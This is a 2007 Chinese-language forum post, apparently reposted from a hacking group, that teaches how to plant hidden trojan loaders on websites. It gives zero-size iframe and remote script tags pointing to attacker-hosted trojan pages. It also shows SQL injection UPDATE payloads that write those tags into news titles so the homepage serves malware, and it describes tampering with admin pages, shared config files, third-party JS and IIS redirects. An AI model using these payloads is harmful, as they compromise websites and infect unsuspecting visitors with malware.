引用 | 編輯
millets
2007-02-14 16:28 |
樓主
▼ |
||
x0
文章作者:Pixy信息來源:邪惡八進制信息安全團隊(www.eviloctal.com) ============================================= 普通法:(Iframe用法詳解 — http://zhidao.baidu.com/question/6079225.html?si=2) 一普通的掛馬的都是用框架,這是最基本的掛馬方式,那就想插入哪裡就寫哪裡了 最基本的語句當然是 <iframe src=http://www.xxxx.com/muma.htm width=0 height=0></iframe> 其中http://www.xxxx.com/muma.htm是我們的木馬 Js法: 上面可能是一般的掛馬方式,初學者的玩法,好了,再說深一點點的,那就是js檔案,現在好多網站都調有了JS 其中的語句是: <script language=javascript src=./xxxx.js></script>,想到了什麼,這裡也可以掛馬,其中我們可以遠程調用自己的js 比如:<script language=javascript src=http://www.xxxx.com/muma.js></script> 這個muma.js就可以寫木馬了,怎麼寫呢,同樣,我們還用最基本的iframe框架,不過在<script></script>之中可識別語言不是html,js檔案可以這樣寫: document.write("<iframe <iframe src=http://www.xxxx.com/muma.htm width=0 height=0></iframe>"); 這種形式,這時就可以執行此js中的代碼了,當然了,說白了,其實全語句就是 <script language=javascript>document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>")</script> Js技巧: <script></script>之中,無論什麼後綴的檔案,只要裡面寫的語句可以被javascript識別就會執行,比如<script src=http://www.xxxx.com/mm.ooaa></script> <script src=http://www.xxxx.com/mumma.haha></script> 不管後綴是什麼了 都可以執行... 同樣,如果首頁調用其它網站,或者次級目錄中的Html,Asp等 例:<iframe src=./about/nihao.htm width=200 height=100></iframe> 也可以在nihao.htm檔案裡掛馬,可以是htm和js,隨便哪種,這種比較隱蔽,適用於主頁沒有寫權限時利用。 <script>於<iframe>比較 貌似script整體掛馬的代碼長度比iframe小得多,說實用是在資料庫方面,下面介紹。資料庫掛馬,這裡我們拿mssql資料庫為例子。 這裡說的是首頁調用到的資料庫,比如新聞,論壇,公告,等等,一般是標題。 舉個例子,比如首頁有一條新聞為:「今日報道」,那麼滑鼠點此新聞,地址欄打開的新窗口為news.asp?id=XX,這種情況,這時,就可以判斷此新聞是從資料庫中調用的了,當然了,我們不說access,只說mssql。 首頁,我們要有這個網站中的一個注入點,比如就點在music.asp?id=1,同時,至少是Db_Owner權限,這時如果要掛馬可以不用取到webshell,因為如果我們的目的只在於掛馬的話,而且有時,還得檢測mssql資料庫和web服務器不在同一個機器上,那掛馬的方式就是更改資料庫內容,這裡我說的就是這種,如上面說的,首頁顯示的一條新聞標題為「今日報道」,如果首頁顯示的標題是「今日報道</a><iframe src=http://www.xxxx.com/muma.htm width=0 height=0></iframe>」,那這樣的話,首頁就會執行這段代碼了,像這種情況,找到了注入點,就得找表名,如此新聞的表名為news,字段為title,ID等等,根據猜測 ' and1=1 …… 暴出的字段title的值就為「今日報道」,那麼90%就可以猜到了,首頁調用的資料庫的字段就為news表中的title,這時在注入點,可以大膽提交music.asp?id=xxx;update news set title='今日報道</a><iframe src=http://www.xxxx.com/muma.htmwidth=0 height=0></iframe>' where id=1; 這樣就可以更改資料庫了,前提是最少要少Db_Owner權限,當然也有時由於代碼原因,也可以這樣提交:Music.asp?id=xxx'update news set title='今日開夜</a><ifrmae src=http://www.xxxx.com/muma.htm width=0 height=0></iframe>' where id=1 and Ƈ'=Ƈ 等等…… 這種方法是有問題的,實戰中存在不少問題,因為一般的情況下,標題都是通過<table>來限制寬度,也就是說如果你的標題的長度超過了指定的長度,那麼你的代碼只能寫一半,這樣就不能執行了,所以掛馬最好的方法是用<script>這種方法來掛馬了,如: music.asp?id=xxx;update news set title='今日報道</a><script src=http://www.xxxx.com.muma.htm></script>' where id=1;--長度有很大的減少,很不錯。 後台掛馬法: 通常拿不到webshell,就只能靠進後台掛馬。 這裡說的是進入了後台,但不能通過後台得到webshell,這時要仔細關察後台,像比較網站的鏈接、頂部底部的廣告、都可以直接寫入你的木馬代碼,等等,後台是靈活的,具體問題具體分析。不過有一點很重要,是不要打亂前台htm源檔案裡的代碼邏輯,比如應該閉合前面的<a><img>"( 等這些符號,應該先閉合掉如</a></img>")。 其它形式 例如首頁調用了<iframe src=music.asp?id=1&no=view width=100></iframe>此種形勢,一樣可以在music.asp中直接寫入iframe木馬代碼,如果調用的是<script src=music.asp?id=1&no=view width=100></script>在music.asp寫代碼時 請用document.write("")這種格式寫入,當然,如果被掛檔案中還有調用的檔案可以繼續往深處寫,如果你夠狠的話,直接寫到資料庫配置檔案中,如conn.asp,這樣好多頁面可以同時掛上你的一種木馬了。 當然這裡也有js檔案,一樣原理。 掛一個網站的馬,不一定就得攻入他,有時沒有方法的同時,可以考慮跨站。好多站用了別的站的js檔案,如:<script src=http://www.sohu.com/user.js>這種情勢,這時就可以考慮只拿sohu.com的權限就行了,只要能修改到user.js檔案就可以掛到你要掛的站點了,同理,也有<iframe src=http://www.sohu.com/user.htm>此種情況,一樣道理,劍走偏鋒,達到目的,無論用什麼招數了。 服務器掛馬法: 這裡簡單說一個比較狠的吧.重定向任何調用的htm,js,等檔案,只要是執行的 這種方法在計算中用搜索搜索不到的,反正本地怎麼找也找不到。只能在IIS裡設置..而且調用檔案那麼多,怎麼知道是重定向的那個檔案呢? x0
|